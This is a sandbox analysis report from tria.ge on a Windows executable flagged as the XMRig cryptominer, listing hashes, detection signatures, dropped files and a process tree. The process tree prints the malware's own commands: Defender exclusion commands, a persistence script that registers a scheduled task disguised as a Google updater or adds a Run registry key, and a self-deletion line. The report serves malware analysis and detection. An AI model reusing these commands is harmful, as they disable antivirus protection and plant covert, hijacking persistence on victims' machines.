Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/02/2025, 16:33

250211-t2ztsstkey 10

11/02/2025, 16:33

250211-t2zh2atkex 10

11/02/2025, 16:33

250211-t2yxhatkew 10

11/02/2025, 16:33

250211-t2nrjasqdk 10

24/10/2024, 20:12

241024-yyvg5asemn 10

24/10/2024, 20:11

241024-yygk9ssemk 10

24/10/2024, 20:11

241024-yygahasemj 10

24/10/2024, 20:11

241024-yyd55sselq 10

24/10/2024, 20:08

241024-yw247asdqp 10

24/10/2024, 20:08

241024-yw1lcssdqn 10

Analysis

  • max time kernel
    899s
  • max time network
    908s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250211-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/02/2025, 16:33

General

  • Target

    grhddhsGHswgh/qM5GMXBk6hJE6Y5e (30).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3488
      • C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (30).exe
        "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (30).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1292
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3876
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1248
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2248
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:4808
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (30).exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:628
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:944
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1388
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1216
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              3⤵
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:4972
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic PATH Win32_VideoController GET Name, VideoProcessor
                4⤵
                • Detects videocard installed
                PID:3948
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:1100
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2420
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:4444

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log

            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            35967cf5ed9a95ec4fe527dd96567a02

            SHA1

            6a7439c241a30ec540d5d204e02a4cbb2a464737

            SHA256

            4394552922777081d43fb523126cf176d5a676602a5435713320942034f6b3cf

            SHA512

            419b3c336a67ef964bc166d1267cea146ed5878f98304d6e39fb9a3c0394d75693810a9ddc101cdda5e3196ad7d603df01a3260705cf9ef7cf8d4b252df01f45

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            acc422feeea9e2fc9eb6fa5704913a6d

            SHA1

            9fcbc5a362bce0e71100dc9007a71332528fbad6

            SHA256

            241663fd7326f48a845c52b9ffcfdb34845a59ab271ec639c9f9af84df7b712d

            SHA512

            f11c367a4bc5e4c4ccf3a95cf7dd9c5f0708473e86b99c759e5468b431693d4da6eeda7cc95e471e6e4132cf0450262627227160819936e5e176f493c178f89d

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gwujrtia.xya.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/688-72-0x0000018F2E5D0000-0x0000018F2E5DA000-memory.dmp

            Filesize

            40KB

          • memory/688-71-0x0000018F2E5C0000-0x0000018F2E5C6000-memory.dmp

            Filesize

            24KB

          • memory/688-70-0x0000018F2E590000-0x0000018F2E598000-memory.dmp

            Filesize

            32KB

          • memory/688-64-0x0000018F2E350000-0x0000018F2E36C000-memory.dmp

            Filesize

            112KB

          • memory/688-69-0x0000018F2E5E0000-0x0000018F2E5FA000-memory.dmp

            Filesize

            104KB

          • memory/688-68-0x0000018F2E580000-0x0000018F2E58A000-memory.dmp

            Filesize

            40KB

          • memory/688-67-0x0000018F2E5A0000-0x0000018F2E5BC000-memory.dmp

            Filesize

            112KB

          • memory/688-66-0x0000018F2E430000-0x0000018F2E43A000-memory.dmp

            Filesize

            40KB

          • memory/688-65-0x0000018F2E370000-0x0000018F2E425000-memory.dmp

            Filesize

            724KB

          • memory/1216-105-0x00007FF7737D0000-0x00007FF7737E6000-memory.dmp

            Filesize

            88KB

          • memory/1216-112-0x00007FF7737D0000-0x00007FF7737E6000-memory.dmp

            Filesize

            88KB

          • memory/1248-30-0x00007FFC621F0000-0x00007FFC62CB1000-memory.dmp

            Filesize

            10.8MB

          • memory/1248-28-0x00007FFC621F0000-0x00007FFC62CB1000-memory.dmp

            Filesize

            10.8MB

          • memory/1248-27-0x00007FFC621F0000-0x00007FFC62CB1000-memory.dmp

            Filesize

            10.8MB

          • memory/1248-16-0x00007FFC621F0000-0x00007FFC62CB1000-memory.dmp

            Filesize

            10.8MB

          • memory/1292-32-0x00007FF7E5010000-0x00007FF7E5221000-memory.dmp

            Filesize

            2.1MB

          • memory/1292-0-0x00007FF7E5010000-0x00007FF7E5221000-memory.dmp

            Filesize

            2.1MB

          • memory/2420-45-0x00007FF789420000-0x00007FF789631000-memory.dmp

            Filesize

            2.1MB

          • memory/2420-100-0x00007FF789420000-0x00007FF789631000-memory.dmp

            Filesize

            2.1MB

          • memory/3876-15-0x00007FFC621F0000-0x00007FFC62CB1000-memory.dmp

            Filesize

            10.8MB

          • memory/3876-2-0x0000026D31900000-0x0000026D31922000-memory.dmp

            Filesize

            136KB

          • memory/3876-8-0x00007FFC621F0000-0x00007FFC62CB1000-memory.dmp

            Filesize

            10.8MB

          • memory/3876-13-0x00007FFC621F0000-0x00007FFC62CB1000-memory.dmp

            Filesize

            10.8MB

          • memory/3876-1-0x00007FFC621F3000-0x00007FFC621F5000-memory.dmp

            Filesize

            8KB

          • memory/4444-117-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-131-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-107-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-109-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-111-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-101-0x000001B5295A0000-0x000001B5295C0000-memory.dmp

            Filesize

            128KB

          • memory/4444-113-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-115-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-99-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-119-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-121-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-123-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-125-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-127-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-129-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-106-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-133-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-135-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-137-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-139-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-141-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-143-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-145-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-147-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-149-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-151-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-153-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-155-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-157-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-159-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-161-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB

          • memory/4444-163-0x00007FF6A8C90000-0x00007FF6A9484000-memory.dmp

            Filesize

            8.0MB